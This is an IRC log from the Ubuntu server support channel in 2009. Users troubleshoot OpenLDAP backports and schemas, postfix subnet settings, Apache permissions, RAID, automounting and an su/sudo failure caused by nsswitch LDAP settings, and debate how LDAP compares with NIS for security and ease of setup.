<clusty> Sam-I-Am, i meant on the server side
<clusty> once setup in hardy should work in jaunty?
<Sam-I-Am> bobg: particularly the openldap packages/libraries... but it might help management tools as well.  i usually just write my own.
<clusty> bobg, that is only sucky part
<Sam-I-Am> clusty: upgrading *should* work... however, back up the database manually first.
<clusty> bobg, importing users
<bobg> Sam-I-Am:  I went through a huge. long process with xen + hardy -- it turn out that the xen guys considers hardy's kernel  version to be a problematic  xen kernel.  The problem is only with high, prolonged loads (and maybe agrevated by our internal app)
<Sam-I-Am> i usually dont let ubuntu auto-upgrade anything for me
<Sam-I-Am> bobg: you could pop another kernel on hardy
<bobg> Sam-I-Am: i could not find a compatible alternate xen kerenel for hardy (after much work:)
<Sam-I-Am> surely there are people running hardy on xen
<bobg> Sam-I-Am: but, I am starting from scratch with this ldap project so I could start with jaunty from th start
<Sam-I-Am> sure, but which release you choose depends on how often you want to do forklift upgrade of server-class stuff
<bobg> yeah, we have DNS servers, web servers (that are not heavily loaded) and other things taht are working fine with xen - hardy
<bobg> so for many things its not problem
<bobg> its intersesting to note that amazon ec2 uses xen and their hard images use a modified fedora  8 xen kernel
<bobg> s/hard/hardy/
<Sam-I-Am> thats amusing
<bobg> clusty: thanks for your comments. I setup our first LDAP server 3 years ago and getting teh schema and user data correct was a real PITA
<clusty> bobg, some guy from #LDAP gave me his pythin script
<clusty> with some modifications i got it to make the right ldif-s
<bobg> I was hoping that in the latest ubuntu I could just install some higher level package and have a gui to add, edit and delete users :)
<Sam-I-Am> theres phpldapadmin
<Sam-I-Am> and a few others
<bobg> clusty: hmmm, I will hang out there (#ldap) will I do this and see what tips I can get
<Sam-I-Am> luma is a decent gui tool with limited built-in features
<clusty> bobg, problem is they are quick to pull the RTFM line :D
<clusty> not very understanding with us, mere feable minded mortals that are just starting with LDAP
<bobg> :) I probably have a lot of reading to do
<jtimberman> phpldapadmin is pretty good. jxplorer is a standalone gui that also works but i don't know if its packaged in ubuntu.
<Sam-I-Am> http://packages.ubuntu.com/hardy/web/gosa
<jtimberman> clusty: and the problem with that FM (ldap) is its huge, complicated, and ldap itself is confusing.
<Sam-I-Am> might be a thought...
<bobg> i use a old version of phpldapadmin now -- it fine to do IT maitainence, but the higher level stuff sucke -- I will check out to see how they have improved
<Sam-I-Am> ldap is so diverse and open that its difficult to write an app that handles everyones situation
<bobg> Sam-I-Am: gosa looks interesting:)
<clusty> jtimberman, well they don't easy you in
<Sam-I-Am> you're generally stuck picking something and dealing with its crap, or writing your own
<clusty> you get shitloads of switches and funny acronyms that make no sense
<clusty> and to top it up the thing that killed me is: querying the wrong base path gives you bad username :D
<clusty> so i bashed my head against the wall for a few days to figure that one out
<Sam-I-Am> well, duh
<Sam-I-Am> it can't find who you're looking for
<clusty> should say that LD
<clusty> :D
<clusty> dunno WTF you are talking about, not invalid credentials
<bobg> if it had decent error messages, then what would the ldap guru's do with their secret decoder rings:)
 * Sam-I-Am notes he's also in #openldap and #openldap-devel :P
<Sam-I-Am> we dont bite that hard...
<Sam-I-Am> i'd just make sure you've done some reading first
<bobg> Sam-I-Am: I should have guessed that from your earlier comments:)  It was a general comment that could be said for any open source project (and many closed source too:)
<bobg> (no offense intended)
<Sam-I-Am> i know
<bobg> Sam-I-Am: to clarify, if you were building either a hardy or jaunty based ldap server today, you would be looking to get a backported karmic openldap?
<Sam-I-Am> yes
<bobg> or is the jaunty version up-todate enough?
<bobg> ok
<Sam-I-Am> its better than intepid/hardy for sure
<bobg> thanks
<Sam-I-Am> depends on what youre doing with it
<Sam-I-Am> for example, multi-master and mirror-mode work much better in 2.4.17 than 2.4.15 and earlier
<Sam-I-Am> i use LTS because all of the other packages are supported/updated for longer than intermediate releases... not that i plan to run hardy forever, but potentially longer than other releases would be officially supported
<Sam-I-Am> then i backport or custom build newer stuff to work on LTS
<bobg> i am looking for a basic master/slave setup  with a pretty full shema -- postfix for ubuntu logins, samba (PDC if will still have too), raduis, various one off ldap web apps
<bobg> s/will still.../we still .../
<bobg> i think building and maintaining the schema is my major fear
<Sam-I-Am> do you need a custom schema?
<bobg> our current schema grew into a mess, so I am starting over
<Sam-I-Am> otherwise its easy
<bobg> is there a standard schem that does posfix + samba?
<Sam-I-Am> samba has its own schema
<mathiaz> Sam-I-Am: have you tried to pushed the new version of openldap in hardy-backports?
<mathiaz> Sam-I-Am: https://help.ubuntu.com/community/UbuntuBackports
<mathiaz> Sam-I-Am: ^^ seems like a good place to push new versions of openldap for an LTS
<Sam-I-Am> i think theres a postfix-ldap package which contains the ldap stuff
<bobg> I am on the fence to try to abandon samba support all together - we are moving from windows clients to linux (for users) but we still have quite a few windows machines that need to access shared file servers
<Sam-I-Am> mathiaz: no, not yet... it doesn't backport cleanly due to dependency problems.
<Sam-I-Am> mathiaz: i just backported the newer dependencies for my stuff... havent had time to make it work with original hardy stuff
<mathiaz> Sam-I-Am: right. Sometimes you'd also need to backport some of the dependencies to hardy too
<Sam-I-Am> is there a method to determining which ones are ok to backport?
<bobg> woops I realize I was writing postfix when I meant posix  (we need both)
<Sam-I-Am> i keep everything in launchpad PPAs... so you could check my PPA dependencies for the openldap packages and see if they work for you... then backporting would be easier since most of the work is done
<Sam-I-Am> mathiaz: https://launchpad.net/~ionosphere80/+archive/msk-7
<Sam-I-Am> bobg: posix is its own schema too
<mathiaz> Sam-I-Am: the wiki page listed above outlines how to get things accepted in backports.
<bobg> and do the posix and samba schemas coexist well? or would my life be much easier to deal with only posix?
<bobg> clusty:
<Sam-I-Am> they work fine together
<Sam-I-Am> and you can add kerberos without any issues :)
<bobg> ok cool
<Guest26989> how do ip show the ip addresses 24.249.66.129 - 24.249.66.142 in the format 24.249.166.129/143?
<bobg> I have always been fuzy on the role of kerberos in relation to samba / windows pdc / radius
<bobg> Guest26989: in what context?
<Guest26989> I have the following static ip address and need to put them into the mynetworks section in postfix and need the correct way to do that.
<Guest26989> Sorry these are the ips 24.249.66.129 - 24.249.66.142
<bobg> oh i see
<bobg> if my math is right, thats a range of 12 ips so it can't be expressed as one range
<clusty> bobg, i did just the posix stuff
<Sam-I-Am> bobg: single-sign-on for unixy hosts... doesnt do crap with windows nt-style domains... but will with samba4
<clusty> bobg, i found a lot of howto's that tell you how to install both smb and posix
<Guest26989> I the gateway is 24.249.166.129 and my range is 138/142
<Guest26989> I only have 5 static ips. Netmask is 255.255.255.240
<Sam-I-Am> the openldap server guide tells you how to do posix and samba
<bobg> Guest26989: /30 indicates 4 ip adresses, of which 2 of them are usable.  /29 indicates 8 ip addresses of which 6 are usable
<Guest26989> My usable addresses according to cox communications is 138 - 142.
<Guest26989> Does my configuration say I have 6 usable
<Guest26989> The broadcast according to cox is 24.249.166.143
<bobg> Guest26989: 138 does not fall on an even  boundary  -- does the config option support a syntax to list a set of ips individually? without doing a range syntax
<Guest26989> bobg Let me look
<bobg> yes, 24.249.166.143 can be a braoadcast address (its on the right boundary)
<Guest26989> _bobg This is the line in my postfix main.cf
<Guest26989> mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
<Guest26989> I am a noobie to linux and trying hard to learn it.
<bobg> 24.249.166.140/30 is a 4 ip address block (two useable) with that broadcast IP) and 24.249.166.136/29 is a 8 ip block (6 usable) with that broadcast IP)
<Guest26989> _bobg Thanks much, I will try that one.
<bobg> the reason the 'usable' is always two less is that the first ip is the (sub)network address and the last is the broadcast address
<bobg> Guest26989: glad I could help - good luck
<Guest26989> Thank you very much.
<kboi> hello channel
<uvirtbot> New bug: #422138 in apache2 (main) "Slow memory leak, seen on two machines, appears to be dupe of 224945 even after -updates" [Undecided,New] https://launchpad.net/bugs/422138
<ScottK> mathiaz: Someone from the server team might want to talk with the Full Circle magazine people.  I understand their latest edition has a nice story on using webmin on Ubuntu.
<mathiaz> ScottK: hm - good point.
<Nafallo> o\
<Sam-I-Am> i havent seen this on karmic server yet, but have any of you guys gotten really weird errors from su and sudo on desktop karmic?
<Sam-I-Am> like... they're unusable
<Sam-I-Am> looks like something is getting in the way near the kernel level... almost like apparmor, but i already ditched that
<Sam-I-Am> errors like... setgid operation not permitted
<ScottK> Sam-I-Am: Sounds like policykit integration and it's not relevant to -server.
<Sam-I-Am> hmmm
<Sam-I-Am> could be... thats a new one to me
<Sam-I-Am> why do people insist on using this crap
<Sam-I-Am> its more irritating than anything
<Sam-I-Am> like apparmor
<kees> Sam-I-Am: what are the errors?
<Sam-I-Am> sudo says "setreuid(ROOT_UID, user_uid): Operation not permitted"
<Sam-I-Am> su says "setgid: Operation not permitted"
<Sam-I-Am> which is even before theyd get to their usual error messages if i wasnt in sudoers or didnt know the root password
<VirtualDisaster> ScottK, i dont like webmin tbch
<VirtualDisaster> needs to be redone from scratch
<VirtualDisaster> more simpler
<ScottK> VirtualDisaster: As a team we don't think much of it here.
<VirtualDisaster> oic
<VirtualDisaster> i really feel someone (maybe me) needs to make a SIMPLER web management UI
<VirtualDisaster> like advanced items that require CLI need to be done via CLI
<VirtualDisaster> stop trying to hide the OS from the admin/user
<VirtualDisaster> ppl need to be aware of what they are using/doing/etc
<VirtualDisaster> and be familiar w/ the required tasks
<VirtualDisaster> too much "slap ohhh shiney" on it
<VirtualDisaster> is what it seems to be today
<VirtualDisaster> p*sses me off when I show client Ubuntu and their like "Windows 7 has that too"
<VirtualDisaster> well guess what we had it before they did ...!!!!!
#ubuntu-server 2009-09-01
<Claw6> do i need a DNS running if i want to connect to a vhost? vhost ist X.X.X.1 and client is X.X.X.2
<Claw6> i need some information how that vhost thing works
<Chriz2> how do i get make?
<Chriz2> can someone give me their sources.list?
<howie> Is there a good chat server in the ubuntu apt database?
<howie> web based
<howie> user ..
<Chriz2> howie, unrealircd :D
<Chriz2> and setup something like pjirc...
<howie> cool ill check it out ty
<howie> Chriz2: ya im not finding it in the repository
<jmarsden> howie: Do something like apt-cache search "irc server" and pick one of those that meets your needs.
<howie> will an irc server work as a website chat program?
<jmarsden> Not without a lot of work
<jmarsden> I didn't realize you were looking for web chat.  For web chat, try any CMS platform and look for its chat module... Django maybe?
<lamont> ScottK: have I mentioned how much pain it is when he revs 4 stable versions?
<jmarsden> lamont: Wrong channel?
<ScottK> lamont: I thought the wonder of Git made it all easy.
<ScottK> jmarsden: Not at all.
<lamont> jmarsden: nah - just context free
<jmarsden> Ah, OK...
<lamont> ScottK: it's more the iterations
<ScottK> Not free, just well detached.
<ScottK> jmarsden: Context is in the scrollback it you care.
<ScottK> it/if
<Chriz2> anyone around that can lend a hand with apache?, it keeps saying permission denied =\
<Chriz2> Forbidden
<Chriz2> You don't have permission to access / on this server.
<jmarsden> Chriz2: How did you install it, and what did you do after installing it to configure it?
<Chriz2> jmarsden, i changed the root dir to my local home dir (i just prefer it i suppose...), and added suphp, i disabled suphp and i still get this problem
<jmarsden> Chriz2: Undo your change and learn how to configure virtual hosts so you can set one up for your home dir (if you really must).
<Chriz2> jmarsden, well the domain (only one...) is in my home dir :D
<Chriz2> i changed 000-default
<Chriz2> ive done this before just this time its being a **** lol
<jmarsden> Well, what are the perms on your home dir?  0755 ?
<Chriz2> i tried 777, 755, 700, etc
<Chriz2> like wise with public_html
<jmarsden> If you had left things alone, public_html is for  http://example.com/~username/
<Chriz2> jmarsden, i know and i was getting the same problem i am now even doing ip/~chr1831
<jmarsden> Might be best to apt-get purge apache2 and then reinstall, then see if it works unmodified... then go forward (more carefully) from there.
<lamont> ScottK: context is what, 2 days ago?
<ScottK> lamont: Roughly.
<lamont> wow.  I never did 2.6.4, eh?
<ScottK> We just handle disjointness better than most.
<ScottK> IIRC from the release announcement it was never announced.
<ScottK> ... 2.6.5 ...
<lamont> yah - scraping the bts for trivials now
<lamont> ScottK: any thoughts on 504027?
<lamont> and 528839
<lamont> 307186 is just funny
<ScottK> 504027 conceptually makes sense except for the part about updating the chroot seems a bit of a corner case.
 * ScottK has to run.
<ScottK> Will look in again later.
<lamont> ta
<CrawfordComeaux> is there any reason why I shouldn't install enterprise cloud on desktop instead of server?
<CrawfordComeaux> it's purely for testing right now, not production
<jmarsden> Well... the cloud virtual machines won't have screens on them.  Desktop installs X and expects a GUI; server does not.  So you could try it, but why would you prefer a desktop installation in the cloud anyway?
<jmarsden> See https://help.ubuntu.com/community/ServerFaq#What%27s%20the%20difference%20between%20desktop%20and%20server?
<lamont> ScottK: E: postfix: python-script-but-no-python-dep ./usr/sbin/postfix-add-filter
<lamont> pls to be providing a patch. kthx
<lamont> ScottK: 2.6.5-1 uploaded to debian.. you wanna request the sync?  if not, I'll do it tomorrow or wednesday
<CrawfordComeaux> I'm just testing cloud implementations on my laptop to explore the differences before putting anything into production
<jmarsden> Ah, sorry I read that backwards... you can install the server or cloud editions onto a desktop PC, sure.
<uvirtbot> New bug: #414507 in dhcp3 (main) "broken AppArmor profile " [Undecided,New] https://launchpad.net/bugs/414507
<wfiuewfew> Hi---I am wondering if Ubuntu server automounts usb hard drives
<jmarsden> wfiuewfew: It should automount them, just as Ubuntu Desktop does, yes.
<jmarsden> It's not something most servers have high on their list of requirements, but it should work fine :)
<wfiuewfew> jmarsden: Thanks, what about internal hard drives?
<jmarsden> Ubuntu Server is just Ubuntu Desktop with no GUI and a server-optimized kernel... it works fine with internal hard drives, as you'd expect.
<jmarsden> See https://help.ubuntu.com/community/ServerFaq#What%27s%20the%20difference%20between%20desktop%20and%20server?
<jmarsden> If you need to know exactly what it does, check /lib/udev/rules.d/60-persistent-storage.rules for the gory details.
<jmarsden> You can alter that behaviour by copying the file to /etc/udev/rules.d/ or creating your own config file in there.
<qman__> ubuntu server does not automount drives, but it does autodetect and assign a device name
<qman__> which you can then use to mount the drive
<jmarsden> If that's the case, I suspect autofs could easily be configured to mount them on demand, or udev rules written to do it.  One way or another the capability is there, even if it isn't enabled by default.
<qman__> you might be able to, but that functionality is provided by gnome/KDE in the desktop versions of ubuntu
<qman__> it's high level and is actually undesirable in many server situations
<qman__> however, configuring your fstab or creating a script yourself is a fine way to handle it
<jmarsden> OK... that would explain it... though why an automounter is seen as being part of a GUI is an interesting question.  fstab and scripts are fine, but not fully automatic.  And yes, people running around plugging USB hard drives into machines in our server room would generally be considered "undesirable", too :)
<qman__> well, besides the security concerns
<qman__> automounting a failing device could cause a crash
<qman__> and an automounter is fairly unnecessary and a waste of resources in most server environments
<qman__> it's also undesirable for RAID devices, since you need to mount them in a particular way
<CppIsWeird> does fdisk -l list raid5 volumes?
<jmarsden> It lists partitions.  Partitions with type 0xFD are (I think) ones use to create software RAID volumes in Linux.
<CppIsWeird> hmm, lets try something shorter, (yes/no)?
<CppIsWeird> :P
<jmarsden> Define what you mean by "RAID5 volume" if you need that sort of brevity of response.
<jmarsden> It knows nothing about RAID, so of course it can't know that the 3 or 4 or 5 partitions underlying a given RAID volume are somehow related and show you one RAID5 volume.
<jmarsden> It can and will display the partitions, as being of type 0xFD
<jmarsden> If in doubt, try it out :)
<CppIsWeird> basically i have a raid 5 set up on a computer and i'm trying to find its volume so that i can mount it. how do i find this? it does not appear using fdisk -l or df.
<jmarsden> "Find its volume"?  What do you mean?  Is this Software RAID5, or is a hardware RAID controller involved?
<CppIsWeird> im looking for the device representation that is assigned to the raid 5. software raid 5 using mdadm.
<jmarsden> OK, what does   cat /proc/mdstat     output?
<CppIsWeird> thats it, thanks. :D
<Barre> i'm trying to use bonnie++, but a lot of the ouput i just a bunch of +++++, what parameters do I need to feed to bonnie++ to do all tests?
<spiekey> Hello!
<spiekey> how can i turn off the blank console screensaver?
<spiekey> i have a ILO and when the server crashed i only see a black screen.
<Barre> spiekey: i think its: setterm -blank 0
<spiekey> Barre: thanks
<spiekey> can i check it somehow, too? If it was set correctly?
<macrocosm> is it normal to have the mysql packages not authenticate when doing apt-get update/upgrade? im on ubuntu-server 8.10 ... getting this warning
<macrocosm> WARNING: The following packages cannot be authenticated!
<macrocosm>   mysql-common mysql-server libmysqlclient16 mysql-client-5.1 mysql-server-5.1
<jmarsden> Barre: How long did you let bonnie++ run for?  The default should be to run all the tests, but they do take a while.
<macrocosm> only thing I added to my sources list from the start is deb http://packages.dotdeb.org stable all   &   deb-src http://packages.dotdeb.org stable all which I added for some gd stuff .. do you think that could be mucking up my mysql?  Or should I disregard the warning?
<jmarsden> macrocosm: I'd guess you picked up mysql 5.1 stuff from there and not from real official Ubuntu repositories.
<macrocosm> no .. that was installed already .. or do you mean its trying to go there now?
<jmarsden> It seems to be trying to update the packages it lists... I'm guessing they are from there.
<Barre> jmarsden: I just did a "RTFM", and learned that the ++++ indecates that the tests completed to fast. I should use the -n paramter to specify more files for the metadata tests.. thanks for the input though :)
<macrocosm> hmm .. strange .. guess I could just comment those sources out, but that seems a bit antithetical and I need the gd stuff... is dotdeb.org considered pretty safe?
<jmarsden> OK.  Nice when things happen "too fast", usually it's the other way around and hardware is "too slow" :)
<Barre> true
<macrocosm> Yeah ... that was it .. updates went clean .. guess I need a better source for the gd extras .. lol it tried to take over!
<macrocosm> ugh .. apparently the last time I updated a while back ... it changed my php to the dotdeb version which screwed up my pecl and other things cause it didnt update or remove my /usr/bin/php-config to its php-config5 ... ive looked around but cant find a way to go back to the ubuntu version of php without loosing my stuff.  Anyone have any ideas on what I should do?
<macrocosm> nevermind all that .. just going to revert to before the update ... lol
<acalvo> hi
<acalvo> I'm trying to configure a samba server which allows anonymous access to a share
<acalvo> seems so easy
<acalvo> but I cannot see the share
<acalvo> nor access directly
<acalvo> ok, done, was a DNS realted problem
<smulcahy>  hi, i'm having problems getting the forcedeth module to use options at boot-time (using 8.10). I've put them in /etc/modprobe.d/options but they seem to get ignored.
<smulcahy> has this changed in ubuntu 8.10 server edition or am I missing something?
<smulcahy> The docs seem to suggest this is the right place to put them
<stefan___> y
<ScottK> lamont: The solution to the homework problem you gave me is just to add python to the postfix depends.  Any objection if I just upload it to Ubuntu?
<twb> postfix depends on python now?
<ScottK> There's some helper scripts I wrote that are in Python.
<ScottK> Every Ubuntu install has Python in it anyway, so it doesn't actually add anything.
<lamont> ScottK: I'll go ahead and roll it, I expect
<lamont> it's not like it hasn't been broken that way for months
<lamont> but thanks
<ScottK> lamont: I can just hit dput and save the trouble of the sync bug.
<lamont> and meh.  I'll look at where it gets used, and maybe just make it a recommends.
<lamont> heh.  whatevah
<lamont> does recommends fix it?
<lamont> as in shut  lintian up>
 * ScottK will check
<ScottK> lamont: Recommends is sufficient to make lintian happy.
 * ScottK will upload it that way since my scripts are the only use of Python in the package.
<Psi-Jack_> Just out of curiosity, will ubuntu actually make use of onboard fakeraid, allowing it to use the raid stripes, instead of the actual hdd's directly?
 * ScottK considers lamont's "whateveh" and uploads.
<lamont> ta
<ScottK> Done.
<ScottK> If I'm offline when slangasek comes looking for me, "It was a bug fix only update." is my answer.
<fnky> hi, can anybody give me the name of the virtual package (or list of packages) I'd need in order to get sound (alsa/pulseaudio) working on ubuntu server?
<Psi-Jack_> On a server?
<fnky> yes
<Psi-Jack_> First of all, you don't want pulseaudio. That's not good for a server, as it's alpha/beta quality at best.
<fnky> yeah, I've noticed on my desktop :/
<Psi-Jack_> Second, all you'd need is alsa at the /most/ which is /the/ kernel sound system.
<Psi-Jack_> apt-cache search alsa
<fnky> it seems that's what jaunty uses from what I can tell though
<fnky> ah
<Psi-Jack_> Yeah, most distributions come with pulseaudio these days. It's always the first piece of crap I remove.
<twb> Psi-Jack_: I remove NM before that
<fnky> it's been flaky as hell on my notebook
<fnky> I read the new nokia phone is going to use it
<Psi-Jack_> I never use NM, so, it's never setup to be used in the first place
<Psi-Jack_> Oh Lovely!
<fnky> kind of wondering how that's going to work out since that's pretty much its primary function
<Psi-Jack_> A phone with a really bad sound mixing engine! Great!
<Sam-I-Am> meh @ #ubuntu
<Sam-I-Am> too busy...
<Sam-I-Am> still cant solve my su/sudo blockage problem
<giovani> blockage?
<Sam-I-Am> yeah
<Sam-I-Am> sudo: setreuid(ROOT_UID, user_uid): Operation not permitted
<Sam-I-Am> before it even gets a chance to look at the sudoers file
<Sam-I-Am> as root it works, but thats kinda useless
<Sam-I-Am> its supposed to read the sudoers from ldap
<twb> Sam-I-Am: ask #openldap?
<Sam-I-Am> this is not an ldap problem
<Sam-I-Am> this is something in ubuntu blocking system calls
<twb> Sam-I-Am: apparmor?
<Sam-I-Am> like polkit
<Sam-I-Am> removed apparmor completely
<Sam-I-Am> first thing i do
<Sam-I-Am> this isnt -server, its the desktop ver...
<ahasenack> Sam-I-Am: can you paste a complete session?
<Sam-I-Am> figure i hang out enough in here maybe someone'd know
<jdstrand> Sam-I-Am: please file a bug
<ahasenack> Sam-I-Am: you can also try to enable debug in sudo's ldap support, it's just a config line
<Sam-I-Am> yeah i did
<jdstrand> Sam-I-Am: you'll get more dev involvement
<jdstrand> ok cool
<Sam-I-Am> the kernel wont even let sudo get to where it reads from ldap
<Sam-I-Am> its completely blocked
<ahasenack> Sam-I-Am: is sudo still suid root?
<Sam-I-Am> if i'm root i can see it contacting ldap...
<Sam-I-Am> ues
<Sam-I-Am> this is a standard install of karmic... replaced sudo with sudo-ldap
<jdstrand> Sam-I-Am: this doesn't sound like a default protection mechanism in Ubuntu, but rather a bug
<Sam-I-Am> even running 'su' it blocked
<twb> Sam-I-Am: I'm assuming you've read the logs
<Sam-I-Am> yeah
<Sam-I-Am> su says this... setgid: Operation not permitted
<Sam-I-Am> after i enter my password
<Sam-I-Am> i've been deploying all -server until now, so thats why this hasnt come up... i dont think its ever been an issue on -server
<twb> Sam-I-Am: shoud just use windows on the desktop ;-)
<ahasenack> Sam-I-Am: is it still suid root? Is the filesystem mounted in such a way that the suid bit is honored, i.e., not disabled with "nosuid" mount option?
<Sam-I-Am> twb: ha
<Sam-I-Am> the root fs is not nosuid
<Sam-I-Am> some of the others are, but they're temp places and whatnot
<Sam-I-Am> su is suid root
<Sam-I-Am> does anyone know if polkit could do stuff like this?
<Sam-I-Am> its not in -server ..
<ahasenack> perhaps capabilities
<ahasenack> you could try ps fauxwZ
<ahasenack> see if anything is restricted
<ahasenack> do you see a "+" symbol next to the sudo binary permissions listing in ls -la?
<Sam-I-Am> nope
<ahasenack> well, karmic, I'm just guessing now, I don't know what they are doing
<Sam-I-Am> -rwsr-xr-x 2 root root 140440 2009-06-22 10:14 /usr/bin/sudo
<Psi-Jack_> Just out of curiosity, will ubuntu actually make use of onboard fakeraid, allowing it to use the raid stripes, instead of the actual hdd's directly?
<Psi-Jack_> I'm curious cause I'm thinking the onboard raid would be a little bit faster than using mdadm softraid directly.
<Sam-I-Am> i'm going to re-install regular sudo... not sudo-ldap... see if it works that way
<ahasenack> Sam-I-Am: yeah, I was going to ask if regular sudo worked
<PhotoJim> Psi-Jack_: it depends on the fakeraid chipset, but I see little advantage to using hardware fakeraid when Linux softraid works so well and performs just as well.  and if the controller dies, you still have options to rescue the data.
 * ahasenack would also prefer softraid
<Sam-I-Am> ahasenack: hmm, nope
<Psi-Jack_> Hmmm. I see. Well, that's partly why I'd layer on top of it, LVM, so I could do lvm snapshots.
<Sam-I-Am> lemmie try as a local user vs. ssh
<ahasenack> Sam-I-Am: did you change stuff in your pam config?
<Sam-I-Am> yes, to get ldap working
<ahasenack> Sam-I-Am: sudo-ldap doesn't need pam changes iirc, just nss_ldap
<ahasenack> hmm, maybe for account
<Sam-I-Am> yup
<Sam-I-Am> it shouldnt...
<Sam-I-Am> just nss stuff
<ahasenack> Sam-I-Am: so regular sudo is not working either?
<Sam-I-Am> i have this working fine on ubuntu server boxes... they're ldap auth, sudo, autofs, and kerberos clients with no issues.
<Sam-I-Am> even karmic.
<Sam-I-Am> ahasenack: nope... su doesnt work either... and i did enable the root account by adding a password to it
<ahasenack> Sam-I-Am: so something is wrong with your pam setup it seems
<ahasenack> Sam-I-Am: can regular users read /etc/ldap.conf?
<ahasenack> Sam-I-Am: er, make that whatever ubuntu decided to call nss_ldap's ldap.conf
<Sam-I-Am> yeah, /etc/ldap.conf ... readable
<ahasenack> Sam-I-Am: no specific user needed to bind to the ldap server?
<Sam-I-Am> nope
<ahasenack> Sam-I-Am: does getent passwd list the ldap users?
<Sam-I-Am> yup
<Sam-I-Am> i can log in as an ldap user just fine
<Sam-I-Am> my home dir mounts with autofs/nfs
<Sam-I-Am> i just cant su or sudo... unless i'm root
<VirtualDisaster> Sam-I-Am, edited /etc/suders ?
<Sam-I-Am> kerberos was acting stupid too... host/service keys didnt seem to work... but i havent looked at that yet
<Sam-I-Am> VirtualDisaster: yeah, it ignores my entries
<VirtualDisaster> hmm odd
<Sam-I-Am> the output from running sudo almost seems like it can't even get far enough to read /etc/sudoers
<VirtualDisaster> Sam-I-Am, ironic part is that it works w/ likewise ...
<ahasenack> Sam-I-Am: is /etc/passwd 0644?
<ahasenack> Sam-I-Am: and, about the getent, does it work for a regular user?
<ahasenack> Sam-I-Am: try making a copy of ls and make it suid root, see if a regular user can run it
<Sam-I-Am> yeah getent works for all users
<Sam-I-Am> one sec..
<Sam-I-Am> ls seems to work both ways
<Sam-I-Am> just for fun, i'll change the pam config back to defaults
<ScottK> mathiaz or whoever is doing the Alpha 5 release notes: You can put updated Postfix to 2.6.5 on the list of new stuff.
<Sam-I-Am> ahasenack: so... su definitely knows when i enter the root password wrong... it dies with the correct error.  when i enter it correctly, thats when i get the setgid error
<Sam-I-Am> well, its an nsswitch thing
<Sam-I-Am> putting that file back made sudo/su work again
<Sam-I-Am> as soon as i put 'ldap' for passwd it breaks
<Sam-I-Am> returning it to 'files' or 'compat' works fine
<Sam-I-Am> lets see if sudo-ldap works
<Psi-Jack_> compat is actually usually better anyway.
<Sam-I-Am> well, yeah, but that doesnt do ldap
<Sam-I-Am> i usually do 'ldap compat'
<Psi-Jack_> Hmm
<Sam-I-Am> sudo-ldap works fine
<Psi-Jack_> I dunno. I just simply use NIS these days.
<Sam-I-Am> well, at least it tries looking at ldap
<Psi-Jack_> heh
<Sam-I-Am> nis is evil
<Psi-Jack_> It works, and works well, though.
<twb> But at least it's an easy evil
<uvirtbot> New bug: #420729 in squid (main) "squid stable permissions problems with log files" [Low,Incomplete] https://launchpad.net/bugs/420729
<Sam-I-Am> i guess... its also insecure and unsupported.
<Psi-Jack_> I just hate how netgroups work in nis.
<Psi-Jack_> Sam-I-Am, How is it insecure? :p
<Sam-I-Am> this isnt an ldap problem though
<twb> Psi-Jack_: are you serious?
<Psi-Jack_> Yes, I'm serious.
<Sam-I-Am> this is something broken in ubuntu
<twb> Psi-Jack_: NIS allows any user on any machine to get passwords protected by only crypt (or at best, md5)
<twb> Psi-Jack_: it also allows root on ANY machine on the network to get the privileges of any user, even with root_squash in place
<Psi-Jack_> Really? All my passwords are encrypted by blowfish algorithm, in NIS.
<Psi-Jack_> twb, As for root, that's normal, anyway. root can pretty much do as he pleases.
<twb> Psi-Jack_: but root on a contractor's laptop should not be able to read files belonging to the CEO on the fileserver
<Psi-Jack_> Hmmm.
<Psi-Jack_> So, basically, NIS on laptops, is bad?
<Psi-Jack_> Root's not in my NIS database, just uid's > 1000
<Psi-Jack_> >=
<twb> root doesn't need to be.
<Psi-Jack_> And besides.
<Psi-Jack_> With a proper firewall setup, it's secured. My NIS server is open to my network, but not to my guest subnet, which is where laptops live.
<twb> Fair enough
<twb> If you ultimately trust root on every NIS client, then that problem goes away
 * Psi-Jack_ nods.
<Psi-Jack_> Presisely. ;)
<Psi-Jack_> Though admittedly.
<Psi-Jack_> I would prefer an ldap method overall, but it's such a bitch to setup /and/ maintain. Especially when even the ubuntu ldap docs are incomplete.
<twb> Psi-Jack_: exactly
<Sam-I-Am> its really not bad to set up
<twb> Sam-I-Am: yeah, it is
<twb> Sam-I-Am: compared to NIS, which is turnkey for both server and client side
<garymc> Hi if i make changes in php.ini do i need to restart httpd or something?
<Psi-Jack_> Sam-I-Am, Yes, it is, especially since between openldap 2.0, what I last used, and 2.4, are so different.
<twb> ldap-auth-config is pretty good for the client side of LDAP, but the server side is a ridiculous pain in the arse.
<Sam-I-Am> well, yeah
<Sam-I-Am> things progress over time
<Psi-Jack_> Sam-I-Am, And the ubuntu ldap docs, are incomplete, majorly.
<Psi-Jack_> It gets down to the ldaputils stuff, and they don't even work because the packages themselves are broken.
<twb> For example, if you want password aging to work, you apparently have to turn on the ppolicy stuff, or give root binddn to root on every client.
<Psi-Jack_> They keep trying to use SASL even though SASL isn't even used.
<twb> And of course ppolicy + exop is COMPLETELY DIFFERENT to the documented RFC 2307 password aging attributes.
<Sam-I-Am> ppolicy is fine... it works
<twb> (Oh, and if you're doing it the raw RFC 2307 way, and forget to give the rootbindpw to the LDAP client, it will silently allow expired passwords.)
<twb> Sam-I-Am: yes, it's fine, but it's not turnkey.
<Sam-I-Am> theres a reason sun deprecated NIS years ago
<twb> Sam-I-Am: I noticed that the post-LTS releases actually documented some of it.
<Sam-I-Am> even nis+
<twb> Sam-I-Am: I don't dispute that
<Sam-I-Am> its old, insecure, and broken
<twb> My only point is that compared to NIS, setting up LDAP is a chore.
<Sam-I-Am> maybe i've just done it too often...
<twb> I wouldn't even have known ppolicy existed if I hadn't been talking to upstream on #openldap; IIRC it isn't mentioned at all in the LTS Ubuntu server guide.
<Sam-I-Am> ldap isnt easy at first, but it gets much better
<Psi-Jack_> heh
<Psi-Jack_> Sam-I-Am, So, can you look at the 9.04 ldap docs, and correct it? ;)
<Sam-I-Am> i think the ubuntu guides need a bit of work... i have a ton of docs here at work i wrote for building redundant ldap servers from the ground up with ppolicy, sudo, autofs, etc... trying to get them integrated
<Psi-Jack_> Or send me your docs? ;)
<Sam-I-Am> however, one thing about ldap and all the ancillary stuff... no one way satisfies everyones needs :/
<Sam-I-Am> Psi-Jack_: yeah... i can
<Psi-Jack_> Cool! Email me them to erenfro@gmail.com I'd be greatly appreciative. ;)
<Sam-I-Am> they just need to be sanitized to remove employer-specific stuff
